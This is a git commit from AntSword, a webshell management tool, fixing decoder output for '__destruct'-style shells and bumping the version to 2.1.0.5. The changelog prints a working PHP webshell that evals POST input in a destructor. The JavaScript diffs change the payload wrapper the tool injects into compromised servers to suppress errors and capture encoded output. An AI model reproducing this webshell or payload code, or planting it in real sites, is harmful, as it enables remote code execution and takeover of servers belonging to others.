(Fix:Core) 修复使用 `__destruct` 类型 shell 时解码器不生效的 Bug (thx @scanf)

881e97b7 · Medicean · ed0a2bea · 881e97b7 · 881e97b7 · 881e97b7
Commit 881e97b7 authored Apr 27, 2019 by Medicean
Hide whitespace changes
Inline Side-by-side

Showing with 20 additions and 3 deletions

CHANGELOG.md CHANGELOG.md +17 -0

package.json package.json +1 -1

index.js source/core/php/index.js +1 -1

index.js source/core/php4/index.js +1 -1

No files found.
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -12,6 +12,23 @@

 * 新增 PHP `base64`、`rot13` 解码器

+* 修复使用 `__destruct` 类型 shell 时 解码器不生效的 Bug (thx @scanf)
+
+> 取消 `register_shutdown_function` 改为显式调用 `asoutput`
+
+测试 Shell 如下:
+
+```
+<?php
+class Test{
+  function __destruct(){
+    @eval($_POST['ant']);
+  }
+}
+$test = new Test;
+?>
+```
+
 ### Shell 管理

 * 修复搜索数据时正则表达式输入错误导致crash 问题 #157

--- a/package.json
+++ b/package.json
 {
  "name": "antsword",
-  "version": "2.1.0.4",
+  "version": "2.1.0.5",
  "description": "中国蚁剑是一款跨平台的开源网站管理工具",
  "main": "app.js",
  "dependencies": {

--- a/source/core/php/index.js
+++ b/source/core/php/index.js
@@ -67,7 +67,7 @@ class PHP extends Base {
    }
    // 组合完整的代码
    let tmpCode = data['_'];
-    data['_'] = `@ini_set("display_errors", "0");@set_time_limit(0);${asencCode};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "${tag_s}";echo @asenc($output);echo "${tag_e}";}register_shutdown_function("asoutput");ob_start();try{${tmpCode};}catch(Exception $e){echo "ERROR://".$e->getMessage();};die();`;
+    data['_'] = `@ini_set("display_errors", "0");@set_time_limit(0);${asencCode};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "${tag_s}";echo @asenc($output);echo "${tag_e}";}ob_start();try{${tmpCode};}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();`;

    // 使用编码器进行处理并返回
    return this.encodeComplete(tag_s, tag_e, data);

--- a/source/core/php4/index.js
+++ b/source/core/php4/index.js
@@ -25,7 +25,7 @@ class PHP4 extends PHP {
    }
    // 组合完整的代码
    let tmpCode = data['_'];
-    data['_'] = `@ini_set("display_errors", "0");@set_time_limit(0);${asencCode};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "${tag_s}";echo @asenc($output);echo "${tag_e}";}register_shutdown_function("asoutput");ob_start();${tmpCode};die();`;
+    data['_'] = `@ini_set("display_errors", "0");@set_time_limit(0);${asencCode};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "${tag_s}";echo @asenc($output);echo "${tag_e}";}ob_start();${tmpCode};asoutput();die();`;

    // 使用编码器进行处理并返回
    return this.encodeComplete(tag_s, tag_e, data);